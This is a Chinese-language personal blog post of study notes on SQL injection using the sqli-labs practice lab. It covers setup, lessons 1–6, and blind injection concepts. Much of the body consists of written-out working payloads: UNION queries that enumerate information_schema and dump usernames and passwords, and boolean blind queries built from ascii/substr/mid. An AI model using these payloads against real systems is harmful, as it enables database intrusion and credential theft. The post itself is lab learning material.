<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="sql injection," />










<meta name="description" content="sql注入学习一#sqli-labs环境搭建#windows# sqli-labs需要有php，apache，mysql，学长推荐了集成环境wamp，由于公司电脑不方便自由上网，改为下载phpstudy 将php的版本改为5.4.45nts，因为php7用的是sqli库，php5用的是sql库mac#  使用xampp集成软件，由于使用的是php7，就改用网上大佬改好的php7版的sql库。修改密">
<meta property="og:type" content="article">
<meta property="og:title" content="Sqli-labs Note1">
<meta property="og:url" content="http://yoursite.com/2020/07/29/Sqli-labs-Note1/index.html">
<meta property="og:site_name" content="Cici&#39;s Blog">
<meta property="og:description" content="sql注入学习一#sqli-labs环境搭建#windows# sqli-labs需要有php，apache，mysql，学长推荐了集成环境wamp，由于公司电脑不方便自由上网，改为下载phpstudy 将php的版本改为5.4.45nts，因为php7用的是sqli库，php5用的是sql库mac#  使用xampp集成软件，由于使用的是php7，就改用网上大佬改好的php7版的sql库。修改密">
<meta property="article:published_time" content="2020-07-29T14:39:38.000Z">
<meta property="article:modified_time" content="2020-08-02T15:06:00.425Z">
<meta property="article:author" content="Cici Gao">
<meta property="article:tag" content="sql injection">
<meta name="twitter:card" content="summary">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/07/29/Sqli-labs-Note1/"/>





  <title>Sqli-labs Note1 | Cici's Blog</title>
  








<meta name="generator" content="Hexo 4.2.1"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Cici's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/07/29/Sqli-labs-Note1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Cici Gao">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Cici's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Sqli-labs Note1</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-07-29T22:39:38+08:00">
                2020-07-29
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1><span id="sql-zhu-ru-xue-xi-yi">sql注入学习一</span><a href="#sql-zhu-ru-xue-xi-yi" class="header-anchor">#</a></h1><h2><span id="sqli-labs-huan-jing-da-jian">sqli-labs环境搭建</span><a href="#sqli-labs-huan-jing-da-jian" class="header-anchor">#</a></h2><h3><span id="windows">windows</span><a href="#windows" class="header-anchor">#</a></h3><ol>
<li>sqli-labs需要有php，apache，mysql，学长推荐了集成环境wamp，由于公司电脑不方便自由上网，改为下载phpstudy</li>
<li>将php的版本改为5.4.45nts，因为php7用的是sqli库，php5用的是sql库<h3><span id="mac">mac</span><a href="#mac" class="header-anchor">#</a></h3></li>
</ol>
<p>使用xampp集成软件，由于使用的是php7，就改用网上大佬改好的php7版的sql库。修改密码后出现无法登陆的情况，解决：<a href="https://zhidao.baidu.com/question/1674015081628418067.html" target="_blank" rel="noopener">改密码后不能登陆问题</a></p>
<h2><span id="lesson1-id">lesson1 —— ‘$id’</span><a href="#lesson1-id" class="header-anchor">#</a></h2><h3><span id="xue-xi">学习</span><a href="#xue-xi" class="header-anchor">#</a></h3><p>《MySQL应知应会》第3、4、5、6、7、17章内容</p>
<h3><span id="zhi-shi-dian">知识点</span><a href="#zhi-shi-dian" class="header-anchor">#</a></h3><ul>
<li>‘#’(%23)后面内容被当作注释，系统不会再读取</li>
<li>查询语句为—<code>$sql=&quot;SELECT * FROM users WHERE id=&#39;$id&#39; LIMIT 0,1&quot;;</code></li>
<li>web只会返回第一条数据，要利用id=-1来让第一条结果为无，来输出第二条</li>
<li>打’会报错的原因：源码中未过滤，直接查询</li>
<li>sql注入步骤：字段数-&gt;数据库-&gt;表-&gt;列-&gt;值</li>
<li>联合查询contact，concat_ws，group_concat</li>
<li>information_schema系统数据库，常用表</li>
</ul>
<blockquote>
<p>SCHEMATA 数据库基本信息，数据名，编码类型等<br>TABLES 表信息，基本表or系统表，引擎是什么，表行数，创建和最后修改时间<br>COLUMNS 列信息，数据类型，编码类型，权限，注释</p>
</blockquote>
<h3><span id="gong-ji-guo-cheng">攻击过程</span><a href="#gong-ji-guo-cheng" class="header-anchor">#</a></h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">1. ?id&#x3D;1</span><br><span class="line">   可得到一组用户名和密码</span><br><span class="line">2. ?id&#x3D;1‘  </span><br><span class="line">   报错说明存在注入</span><br><span class="line">3. ?id&#x3D;1’ order by 3 %23</span><br><span class="line">   获知表一共3个字段</span><br><span class="line">4. ?id&#x3D;-1’ union select 1,2,3 %23</span><br><span class="line">   获知仅2、3字段会被显示在页面上</span><br><span class="line">5. ?id&#x3D;-1’ union select 1,user(),concat_ws(‘_’,version(),database()) %23</span><br><span class="line">   获知当前用户，当前数据库以及版本</span><br><span class="line">6. ?id&#x3D;-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema&#x3D;‘security’ %23</span><br><span class="line">   获知数据库security的所有表名</span><br><span class="line">1. ?id&#x3D;-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name&#x3D;‘users’ %23</span><br><span class="line">   获知表users的表列项</span><br><span class="line">8. ?id&#x3D;-1’ union select 1,username,password from users limit 0,1 %23</span><br><span class="line">   获知username和password,修改limit后的值就可以获取全部username和密码</span><br><span class="line">9. ?id&#x3D;-1’ union select 1,group_concat(username),group_concat(password) from users %23</span><br><span class="line">   可以一次性获取全部的username和password</span><br></pre></td></tr></table></figure>
<h2><span id="lesson-2-id">lesson 2 —— $id</span><a href="#lesson-2-id" class="header-anchor">#</a></h2><h3><span id="zhi-shi-dian">知识点</span><a href="#zhi-shi-dian" class="header-anchor">#</a></h3><ul>
<li>注释符有三种</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">‘—- ’单行注释 注意后面有一个空格，web中空格和+等价，也写作’—-+’</span><br><span class="line">‘#’单行注释</span><br><span class="line">‘&#x2F;**&#x2F;’多行注释</span><br></pre></td></tr></table></figure>
<ul>
<li>不使用密码登陆mysql：修改my.ini配置文件，在[mysqld]添加 (未成功)<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">skip-external-locking</span><br></pre></td></tr></table></figure>
修改后封装由id=‘$id’<br>改为id=(‘$id’)<br>这里判断封装闭合方式可用返回的报错信息來判斷<h2><span id="lesson-3-id">lesson 3 —— (‘$id’)</span><a href="#lesson-3-id" class="header-anchor">#</a></h2><h2><span id="lesson-4-id">Lesson 4 —— (“$id”)</span><a href="#lesson-4-id" class="header-anchor">#</a></h2></li>
</ul>
<h2><span id="lesson-5-amp-6">Lesson 5 &amp; 6</span><a href="#lesson-5-amp-6" class="header-anchor">#</a></h2><h3><span id="zhi-shi-dian">知识点</span><a href="#zhi-shi-dian" class="header-anchor">#</a></h3><p>盲注——当数据不会回显到页面时使用<br>盲注分为3类:</p>
<ul>
<li>基于布尔</li>
<li>基于时间</li>
<li>基于报错<h4><span id="1-ji-yu-bu-er-gou-zao-luo-ji-pan-duan">1.基于布尔——构造逻辑判断</span><a href="#1-ji-yu-bu-er-gou-zao-luo-ji-pan-duan" class="header-anchor">#</a></h4></li>
<li>left(a,b) 从左侧截取a的前b位</li>
<li>substr(a,b,c) 从b位置开始取a的c位</li>
<li>mid(a,b,c) 从b开始截取a的c位</li>
<li>ascii()和ord()函数将字符转为ascii值</li>
<li>cast()函数用于将数据转换为另一种数据格式</li>
<li>ifnull()函数用于判断参数是否为null，为null返回第二个参数，不为null返回第一个</li>
<li>regexp正则注入 <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select user() regexp  &#39;^[a-z]&#39;</span><br></pre></td></tr></table></figure></li>
<li>^表示从头开始判断；$表示从尾开始判断；limit不作用于regexp，所以无用</li>
<li>like匹配注入 %用于定义通配符</li>
</ul>
<h4><span id="2-ji-yu-bao-cuo-gou-zao-payload-rang-bao-cuo-hui-xian">2. 基于报错——构造payload让报错回显</span><a href="#2-ji-yu-bao-cuo-gou-zao-payload-rang-bao-cuo-hui-xian" class="header-anchor">#</a></h4><p>//未成功</p>
<h4><span id="3-ji-yu-shi-jian-yan-shi-zhu-ru">3. 基于时间——延时注入</span><a href="#3-ji-yu-shi-jian-yan-shi-zhu-ru" class="header-anchor">#</a></h4><p>//未看懂…</p>
<h3><span id="gong-ji-guo-cheng">攻击过程</span><a href="#gong-ji-guo-cheng" class="header-anchor">#</a></h3><h4><span id="bu-er-zhu-ru">布尔注入</span><a href="#bu-er-zhu-ru" class="header-anchor">#</a></h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">1. ?id&#x3D;1’ and left(version(),1)&#x3D;5 —-+</span><br><span class="line">对版本号进行判断</span><br><span class="line">1. ?id&#x3D;1’ and length(database())&#x3D;8 —-+</span><br><span class="line">对长度进行判断，获知数据库长度为8</span><br><span class="line">1. ?id&#x3D;1’ and left(database(),1)&gt;’a’ —-+</span><br><span class="line">对数据库名字进行判断，先判断首字母是否大于a，后利用二分法来精确得出首字母为s</span><br><span class="line">1. ?id&#x3D;1’ and left(database(),2)&gt;’sa’ —-+</span><br><span class="line">然后对第二个字母进行判断，对其余数字同理，最后可得数据库名称为security</span><br><span class="line">?id&#x3D;1’ and ascii(substr((select table_name from information_schema.tables where table_schema&#x3D;database()limit0,1),1,1))&gt;100 —+</span><br><span class="line">利用substr()和ascii()获知数据表下面的表，与上过程类似，可知第一个子表名字为email，并有表叫users。同一个表的不同位利用substr()后面两个参数进行调整，不同子表用limit的两个参数进行调整。注：database()可以换成‘security’。</span><br><span class="line">?id&#x3D;1’ and 1&#x3D;(select 1 from information_schema.columns where table_name &#x3D; ‘users’ and column_name regexp ‘^username’ limit 0,1)—-+</span><br><span class="line">构造if语句利用regexp来判断，users表中是否有名字为username和password的列。</span><br><span class="line">?id&#x3D;1&#39; and ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))&#x3D;68)--+</span><br><span class="line">用ord()和mid()获取users表的内容，利用limit选择第几个用户，用mid后两个参数决定一个字符串的哪一位</span><br></pre></td></tr></table></figure>
<h4><span id="bao-cuo-zhu-ru-wei-cheng-gong">报错注入——未成功</span><a href="#bao-cuo-zhu-ru-wei-cheng-gong" class="header-anchor">#</a></h4>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/sql-injection/" rel="tag"># sql injection</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/07/26/Jarvios-OJ-Web-WriteUp-%E4%B8%80/" rel="next" title="Jarvios OJ Web WriteUp(一)">
                <i class="fa fa-chevron-left"></i> Jarvios OJ Web WriteUp(一)
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Cici Gao</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%20%7C%7C%20archive">
              
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#"><span class="nav-number">1.</span> <span class="nav-text">sql注入学习一</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#"><span class="nav-number">1.1.</span> <span class="nav-text">sqli-labs环境搭建</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#"><span class="nav-number">1.1.1.</span> <span class="nav-text">windows</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#"><span class="nav-number">1.1.2.</span> <span class="nav-text">mac</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#"><span class="nav-number">1.2.</span> <span class="nav-text">lesson1 —— ‘$id’</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#"><span class="nav-number">1.2.1.</span> <span class="nav-text">学习</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#"><span class="nav-number">1.2.2.</span> <span class="nav-text">知识点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#"><span class="nav-number">1.2.3.</span> <span class="nav-text">攻击过程</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#"><span class="nav-number">1.3.</span> <span class="nav-text">lesson 2 —— $id</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#"><span class="nav-number">1.3.1.</span> <span class="nav-text">知识点</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#"><span class="nav-number">1.4.</span> <span class="nav-text">lesson 3 —— (‘$id’)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#"><span class="nav-number">1.5.</span> <span class="nav-text">Lesson 4 —— (“$id”)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#"><span class="nav-number">1.6.</span> <span class="nav-text">Lesson 5 &amp; 6</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#"><span class="nav-number">1.6.1.</span> <span class="nav-text">知识点</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#"><span class="nav-number">1.6.1.1.</span> <span class="nav-text">1.基于布尔——构造逻辑判断</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#"><span class="nav-number">1.6.1.2.</span> <span class="nav-text">2. 基于报错——构造payload让报错回显</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#"><span class="nav-number">1.6.1.3.</span> <span class="nav-text">3. 基于时间——延时注入</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#"><span class="nav-number">1.6.2.</span> <span class="nav-text">攻击过程</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#"><span class="nav-number">1.6.2.1.</span> <span class="nav-text">布尔注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#"><span class="nav-number">1.6.2.2.</span> <span class="nav-text">报错注入——未成功</span></a></li></ol></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Cici Gao</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
